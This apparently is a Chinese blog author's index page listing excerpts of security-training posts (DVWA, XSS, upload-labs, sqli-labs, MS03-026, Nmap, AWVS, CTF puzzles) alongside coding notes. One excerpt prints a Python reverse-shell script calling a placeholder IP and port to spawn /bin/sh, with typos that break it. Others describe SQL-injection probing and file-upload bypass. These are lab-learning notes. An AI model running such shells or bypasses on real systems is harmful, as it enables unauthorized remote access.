- 博客(45)
- 资源 (4)
- 问答 (1)
- 收藏
- 关注
RSS订阅原创 docker 搭建dvwa解决allow_url_include is not enabled.
搭建好DVWA,从phpinfo处查看应用的php.ini配置文件位置。docker exec -it [容器id] # 进入容器apt update # 容器一 般是apt 更新apt install vim # 容器里没有vim编译器,需要下载一个cd /etc/php/7.0/apache2 # 进入配置文件目录vim php.ini # 修改配置文件找到allow_url_include 值修改为on。这个位置在600多行的位置。# 保存退出后退出容器exit.
2021-12-07 10:15:50
1178
原创 XSS漏洞的与标签的那些个事~
XSS漏洞的与标签的那些个事~0x00(div)0x01(textarea)0x02(input)0x030x040x050x060x070x080x090x0A0x0B0x0C0x0D0x0E0x0F0x100x110x120x00(div)div标签里面插入script即可0x01(textarea)textarea内嵌js脚本,不会被执行。这个时候,我们闭合textarea标签即可0x02(input)借助sql注入的方法,把input标签闭合。我设计了一个点击事件,点击弹出0x0
2021-11-29 14:24:50
3126
原创 攻防世界:Railfence(WWW型解密)
题目描述:被小鱼一连将了两军,你心里更加不服气了。两个人一起继续往前走, 一路上杂耍卖艺的很多,但是你俩毫无兴趣,直直的就冲着下一个谜题的地方去了。 到了一看,这个谜面看起来就已经有点像答案了样子了,旁边还画着一张画,是一副农家小院的 图画,上面画着一个农妇在栅栏里面喂5只小鸡,你嘿嘿一笑对着小鱼说这次可是我先找到答案了。题目:ccehgyaefnpeoobe{lcirg}epriec_ora_g根据题目标识很容易知道,这是一道栅栏解密。奇怪的是分为5栏时,解密结果为:cebgccfe}_en{eoh
2021-10-18 18:37:11
1325
原创 upload(Pass-10~Pass-)
文章目录Pass-10Pass-11Pass-12(失败)Pass-10查看提示:本pass只允许上传.jpg|.png|.gif后缀的文件!有预感是白名单,再查看源码is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".ht
2021-09-26 20:14:56
245
原创 upload(pass01~pass09)
文章目录Pass-01Pass-02Pass-03Pass-04(未解决)Pass-05(失败)自己的一些尝试:Pass-06Pass-07Pass-08Pass-09Pass-01先查看提示:在客户端使用JS对图片进行检查然后上传。解决方法:在客户端向服务端发送请求时抓包,对包进行修改,然后发送给服务端。使用burp进行抓包,抓包内容如下:把一个php文件的后缀改成jpg上传,在抓包时把filename的参数重新更换为1.php,然后放包。返回之后,在控制台可以看到,上传的就是我们的p
2021-09-26 15:02:51
1611
1
原创 关于在upload上遇到的一些php函数解析
前言:打这个靶场,是需要去看懂一些函数的,php学的不好的我,只能用这种方式,记录一下这些函数,便于我之后的一个打靶学习。file_existsw3cschool的解释用于检测目录是否存在,存在返回True,否则返回flase。trimw3cschool的解释移除字符串两侧的字符(“Hello” 中的 “He” 以及 “World” 中的 “d!”)语法trim(string,charlist)参数描述string必需。规定要检查的字符串。charlist可
2021-09-26 13:20:50
83
原创 力扣2337
题目设计一个算法,找出数组中两数之和为指定值的所有整数对。一个数只能属于一个数对。示例 1:输入: nums = [5,6,5], target = 11输出: [[5,6]]示例 2:输入: nums = [5,6,5,6], target = 11输出: [[5,6],[5,6]]提示:nums.length <= 100000解题有两个方法可以很好的解决该问题,一是哈希表,而是双指针的方式。这里我选择后者。思路:将列表转换为有序列表左指针为0,右指针为nums
2021-09-19 21:04:11
105
原创 MS03-026
靶场简介Windows系统漏洞靶场1靶场知识点信息获取,缓冲区溢出,Metasploit攻击靶场描述靶场知识点漏洞名称:MS03-026漏洞介绍:Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏洞。此漏洞最初由lsd-pl.net漏洞研究组在2003年7月16日发现的。这个漏洞被披露以后,随着exploit程序的公开,网上迅速出现了大量的exploit攻击实例,随后利用者个漏洞的蠕虫程序也大量出现,带来了巨大的危害。可以说这是个非常严重的漏洞,影响客户非常广泛
2021-09-16 20:12:15
2124
原创 力扣(29)
题目描述给定两个整数,被除数 dividend 和除数 divisor。将两数相除,要求不使用乘法、除法和 mod 运算符。返回被除数 dividend 除以除数 divisor 得到的商。整数除法的结果应当截去(truncate)其小数部分,例如:truncate(8.345) = 8 以及 truncate(-2.7335) = -2示例 1:输入: dividend = 10, divisor = 3输出: 3解释: 10/3 = truncate(3.33333..) = trunca
2021-09-16 19:28:55
121
原创 一个常见反弹shell脚本详解
# !/usr/bin/pythonimport os, subprocess,sockets = socket.socekt(socket.AF_INET,scoket.SOCK_STREAM)s.connect("IP","port")os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p = sunprocess.call(["/bin/sh","-i"])fileno() 方法返回一个整型的文件描述符(
2021-09-16 15:38:23
95
原创 关于Linux中权限的详细说明
在Linux中,我们使用ll命令可以查看文件以及其权限,其中:r:可读w:可写x:可执行但是我们能看到有三组rwx。其中第一组代表文件拥有者对这个文件的权限第二组代表文件拥有者所在的组中的用户对这个文件的权限第三组除上述两种外的任何用户/组对此文件的操作权限这么一说对于文件权限就很好理解了,但是我一直在困扰,使用chmod命令去修改文件权限的时候,使用的是数字,比如:600、700、777。这又代表什么?r读取:4w写入:2x执行:1三个加起来就是权限了。第一个数字是第一组,第二.
2021-09-15 18:51:14
95
原创 2021-09-09
sqli-labs 靶场打靶basic challengesless-1http://localhost/sqli-labs-master/Less-1/?id=1有信息出现,可以进行联合查询注入根据标题信息,基于get请求的单引号注入,我们可以判断闭合符号为单引号http://localhost/sqli-labs-master/Less-1/?id=1‘出现报错信息,报错如下:You have an error in your SQL syntax; check the manual
2021-09-09 21:08:56
90
原创 CTF之进制转换(CTF一)
最近做网络安全课设,需要打CTF靶场,到了最后写报告的环节,需要写出四个的详细信息,在这里做一个备份。摘要:把大字符串分割成小字符串,小字符串统统变成16进制的字符串,最后进行一个ascii码转换得到flag.首先下载该文件得到了一串字符串:d87 x65 x6c x63 o157 d109 o145 b100000 d116 b1101111 o40 x6b b1100101 b1101100 o141 d105 x62 d101 b1101001 d46 o40 d71 x69 d118 x6
2021-06-04 10:23:45
2480
1
原创 软件安全
文章目录软件安全软件安全的概述软件面临的安全威胁SDS软件漏洞概述概念漏洞生命时间轴软件漏洞的定义Windows系统典型漏洞分析Windows安全漏洞保护分析栈溢出检测选项/GS数据执行保护DEP地址空间布局随机化ASLR安全结构化异常处理SafeSEH软件安全开发模型微软的SDL简化模型名词解释软件安全需求分析外部安全需求内部安全需求软件安全总从性要求软件安全设计经典安全设计原则条目Saltzer和Schroeder提出的安全设计8条原则John Viega 和 Gary McGraw总结的10条软件安全
2021-05-09 13:35:44
1185
原创 利用FTP+Apache2搭建服务器
搭建服务器任务要求:搭建FTP服务器下载vsftpd配置vsftpd.conf创建虚拟用户一、安装生成虚拟帐号数据库工具db二、创建虚拟用户数据库三、修改文件格式四、修改配置文件五、修改配置文件2易错点1:六、创建本地用户guest此账号为ftp服务器上真实存在的,为了安全此用户一般设置为不可登录)七、为每个用户配置单独的文件夹八、设置访问路径易错点2搭建Apache服务器第一步:把我们的ftp家目录加入白名单第二步:把站点换成我们的ftp家目录任务要求:可以利用FileZilla Client上传文件
2021-04-30 23:05:38
507
1
原创 新手需要掌握的Linux命令
说明:根据《Linux就该怎么学》学习目录常见命令格式man 命令常用系统工作命令echo命令把指定字符串“woshiyigeliangzai”输出到终端屏幕的命令为:使用$变量的方式提取变量varl的值,并输出:date命令reboot命令poweroff命令wget命令ps命令五种进程状态top命令top命令执行结果解析常见命令格式常见Linux命令的格式是这样的命令名称 [命令参数] [命令对象]注意:命令名称、命令参数、命令对象之间请用空格分离命令对象一般☞要处理的文件、目录、用户等资
2021-04-25 01:17:02
152
原创 Node核心模块
node.js核心模块fsBufferhttpstream 流:用于和文件或其他的数据流交互fs:文件系统模块通过const fs = require('fs')加载fs模块fs模块中的方法有同步和异步。读取文件内容的函数有异步的 fs.readFile() 和同步的 fs.readFileSync()。异步的方法函数最后一个参数为回调函数,回调函数的第一个参数包含了错误信息(error)。// 同步加载const data = fs.readFileSync('./笔记.md')
2020-10-31 23:42:46
112
原创 Windows系统下升级node
是不是还在寻思怎么在Windows系统上升级node.js?别想着用命令行了n模块是不支持window系统的,window系统升级node就只有到node官网下载window安装包来覆盖之前的node。
2020-10-28 21:09:35
243
原创 2020-10-18 v-常见指令
写在前面:利用脚手架搭建一个Vue项目,然后开始学习。过程省略正式内容:现代开发模式传统开发模式代表Vue/reactjQuery特点20%表现层80%表现层现代开发模式的代表就是Vue/react,与传统开发模式的大部分精力在Class和样式中,Vue只有20%的表现层、核心在数据层视图层 <——> 数据层Vue可以视图层和数据层交换数据前端渲染 vs 后端渲染前端渲染后端渲染降低
2020-10-19 01:52:36
127
原创 JS高级(一)
拷贝继承var obj1={ age:20 cat:["大黄","加菲猫"]};var obj2 = obj1; // 拷贝继承obj2.age = 100;console.log(obj1.age); // 100console.log(obj2.age); // 100// 另一种写法var obj1={ a:10, b:20, c:30};var obj2={ a:obj1.a, b:obj1.b, c:obj
2020-07-31 12:31:28
124
原创 CSS3详解
1. 样式操作背景操作div{ /* 设置背景图片的相关属性操作 */ background: url("1.jpg") no-repeat; /* 设置图片从哪里开始显示 */ /* background-origin: padding-box; 图片从内边距左上角开始显示 */ /* background-origin: border-box ; 图片从边框左上角底下开始显示的 */ /* background-origin: content-box
2020-07-27 19:35:27
135
原创 HTML5详解
1. HTML5版本介绍HTML 2.0–1951年11月作为RFC1866发布,在RFC2845与2000年6月发布之后被宣布已经过时HTML 3.2–1997年1月14日,W3C推荐标准HTML 4.0–1997年12月18日,W3C推荐标准HTML 4.01(微小改进) – 1999年12月24日,W3C推荐标准HTML 5 --2014年10月28日,W3C推荐标准设计HTML 5最主要的目的是为了在移动设备上支持多媒体。例如:video标签和audio及canvas标记新特性:
2020-07-09 18:03:16
262
原创 HTTP协议初识
HTTP请求方式HTTP1.0的请求方法HTTP1.0三种请求方式,GET,POST和HEAD掌握GET请求的标准格式掌握POST请求提交表单,上传文件的方法了解HEAD请求与GET请求的区别HTTP1.1新增的请求方法了解HTTP1.1新增的五种请求方法:OPTIONS,PUT,DELETE,TRACE,CONNECT方法的基本概念掌握HTTP1.1新增的五种请求的基本方法和产生的请求结果HTTP请求由三部分组成,分别是:请求行、消息报头、请求正文请求行以一个方法符号开头,空格
2020-07-01 21:59:22
145
原创 节流与防抖初识
基于防抖和节流的性能优化当下网页中的交互越来越多,很多高频时间带来的性能问题,是一个绕不过去的坎。优化这些高频事件,防抖与节流必不可少。防抖函数与节流函数防抖:就是指触发事件后在n秒内函数只能执行一次,如果在n秒内又触发了事件,则会重新计算函数执行时间。节流:就是指连续触发事件但是在一段时间中只执行一次函数css重绘css回流debounce(防抖)防抖分为立即防抖和非立即防抖非立即防抖:触发事件后函数不会立即执行,而是在n秒之后执行,如果n秒之内又触发了事件,则会重新计算函数执行时间
2020-06-29 11:45:34
105
1
原创 记一次计算机网络上机报告实现过程---web网页制作(二)
记一次计算机网络上机报告实现过程—web网页制作(一)接上一篇,页眉咱是搞完了,现在弄一下这个主体部分。效果图:html 部分这个中间的,咱弄四个部分一个是第一排的logo部分,但是咱这个logo找不到,就用一下自己学校的校徽代替好了,这个字体,咱也不认识,就华文行楷好了,实际上这个图和字体组成的一个logo,但是pr没学好,扣不出来啊,就这样代替一下。之后是一个导航栏部分,用Vue是最好的,但是我开始也没弄成Vue项目,上机要求也没说,这,害,用bootstrap划水一下就可以了再之后就
2020-06-09 23:28:55
715
原创 记一次计算机网络上机报告实现过程---web网页制作(一)
起因这不是计算机网络就要结课了吗,就有了一个上机实验,前几个我看的云里雾里,但到了这第七个web网页,却让我眼前一亮。要求是跟下图要求一致,必须div+css,JavaScript,jQuery。然后是效果图:说实话有点辣眼睛,我好歹也写过几个网页,这种风格,有点难以接受啊。我决定自己优化一下,做出一份好的上机报告!创建项目传统老三项,建立项目文件夹,创建index.html文件,css文件夹,img文件夹,js文件夹。如图:准备工作这老师要求jQuery,因为太久没有写前端项目,再
2020-06-08 14:28:36
601
2
原创 Web漏洞扫描器-AWVS
Web漏洞扫描工具一、Web漏洞扫描工具一、漏洞扫描漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现课利用楼梯的一种安全检测(渗透挂机)行为。二、WEB漏洞扫描器针对于Web应用程序所开发的漏洞扫描器,例如SQL注入、XSS跨站脚本攻击等常见漏洞,进行自动式扫描探测是否存在漏洞。二、安装Linux AWVS移动文件到kali分配权...
2020-04-21 22:02:25
521
原创 端口探测,发现脆弱站点
Nmap端口扫描1. 端口扫描的作用Nmap(“网络映射器”)是免费开放源代码(许可证)实用程序,用于网络发现和安全审核。许多系统和网络管理员还发现它对于诸如网络清单,管理服务升级计划以及监视主机或服务正常运行时间之类的任务很有用。Nmap以新颖的方式使用原始IP数据包来确定网络上可用的主机,这些主机提供的服务(应用程序名称和版本),它们正在运行的操作系统(和OS版本),包过滤器/防火墙的类型...
2020-04-18 22:28:25
273
原创 子域名探测
信息收集对于渗透测试前期来说是非常重要,对于目标站点较为安全的时候我们往往选择寻找子域名进行渗透测试子域名的形式:zkaq.org 顶级域名(一级)a.zkaq.org 二级域名b.a.zkaq.org 三级域名通过点的个数来判断是几级域名DNS解析就是通过dns服务器把域名解析为IP子域名的子域名:我们可以把子域名下的站点当成一个独立的站带你,但是可能防止同一台服务器上当...
2020-04-14 11:59:42
805
原创 谷歌常见语法解析
搜素引擎实际上就是一个爬取url的爬虫搜素引擎就是帮助我们获取信息对方的个人资料公司信息学校简介数据文件…谷歌语法:关键字功能“”双引号内的内容不可拆分site指定域名inurlurl存在关键字的网页intext网页正文中的关键字filetype指定文件类型intitle网页标题中的关键字linkLink:z...
2020-04-12 17:00:45
862
2
原创 爬虫实战之《流浪地球》豆瓣影评分析(三)
4. 分析评论数量及评分与时间的关系首先导入数据,进行一个初步的统计:import pandas as pddata = pd.read_csv('doubanliulangdiqiu.csv',encoding ='GB18030')data['评分'].value_counts()可以看到这样的情况:如果没有数据,可以去看爬虫实战之《流浪地球》豆瓣影评分析(一)的爬取过程。先...
2020-04-06 23:16:37
3591
3
原创 爬虫实战之《流浪地球》豆瓣影评分析(二)
3. 分析好评与差评的关键信息依靠绘制词云图,来分析好评与差评的关键信息的区别数据预处理依靠上一篇爬取到的csv文件,来进行分析,首先导入文件,重点是短评正文的信息。首先是使用结巴库来进行分词,然后去除停用词(停用词是网上公开的,可以自己去找。代码:import pandas as pdimport jiebadata = pd.read_csv("doubanliulangdi...
2020-04-06 17:07:04
2051
1
原创 爬虫实战之《流浪地球》豆瓣影评分析(一)
1. 背景与挖掘目标豆瓣(douban)是一个社区网站。网站由杨勃(网名“阿北”) 创立于2005年3月6日。该网站以书影音起家,提供关于书籍、电影、音乐等作品的信息,无论描述还是评论都由用户提供(User-generated content,UGC),是Web 2.0网站中具有特色的一个网站。网站还提供书影音推荐、线下同城活动、小组话题交流等多种服务功能,它更像一个集品味系统(读书、电影、...
2020-04-05 14:37:36
3695
3
原创 node.js初识 Node(1)
Node.js 就是运行在服务端上的 JavaScriptNode.js 是一个基于Chrome JavaScript 运行时建立的一个平台。Node.js是一个事件驱动I/O服务端JavaScript环境,基于Google的V8引擎,V8引擎执行Javascript的速度非常快,性能非常好虽然 Node.js 是基于 Chrome 的,但是它作为一个服务端语言,可以运行在安装了 Nod...
2020-02-03 14:40:43
88
原创 v-for的双参循环迭代
今天看到这样的一段代码:<a v-for = "(list,i) in lists" :key="i"> </a> data () { return { lists: [ {title: '首页', url: '/home', icon: 'iconiconfontzhizuobiaozhun023101'}, ...
2020-01-22 13:46:02
213
原创 Vue-cli脚手架搭建
Vue是一套用于构建用户界面的渐进式JavaScript框架Vue-cli是vue.js的脚手架,用于自动生成vue.js+webpack的项目模板一、官方文档Vue-cli二、事先安装得安装node.js和npm查看版本node -v npm -vn更新至最新版本 npm install -g node npm install -g npm三、安装脚手架在命令行中cd进...
2020-01-19 20:45:03
363
原创 安装kali出现中文乱码的解决办法
众所周知,很多东西对中文都是相当的不友好,当咱们中国的小伙伴安装了Kali虚拟机选择中文的时候 就出现了难以忍受的乱码,这个十分令人头疼。可以看到 中文字符都变成了方块乱码。 别急 我在整理了网上很多资料后,解决了这个问题 下面就给小伙伴们看一看 记不住的 可以收藏的哦输入locale -a 查看是否有en_US.UTF-8和zh_CN.UTF-8,在命令行输入dpkg-reco...
2020-01-15 12:07:26
1907
1
原创 十大应用安全威胁
常见应用安全威胁(OWASP TOP 10) 2013注入失效的身份认证和会话管理跨站脚本攻击(XSS)不安全的直接对象引用安全配置错误敏感信息泄露功能级访问控制缺失跨站请求伪造(CSRF)使用含有已知漏洞的组件未验证的重定向和转发风险评估标准风险 = 可能性 * 影响颜色越深,说明越容易发生,影响越大注入SQL注...
2019-12-17 18:52:47
2768
原创 给网页标题前加一个小图标
在head部分添加一个link标签<!DOCTYPE html><html><head> <title>Vue测试</title> <link rel="shortcut icon" herf="abcd.ico"></head><body></body></htm...
2019-10-25 15:57:54
275
原创 Github/gitee 与本地仓库关联
刚刚关联成功的我迫不及待写下这篇博客,来避免被遗忘真的是太容易忘掉了笔者看了廖雪峰前辈的教程,但是操作很复杂,可能是我比较愚笨吧,git clgit clone xxxx(xxxx是你的ssh密钥)...
2019-09-07 23:50:10
685
2
FTP服务器开启虚拟用户之后就无法开启ftp服务
2021-04-28
TA创建的收藏夹 TA关注的收藏夹
TA关注的人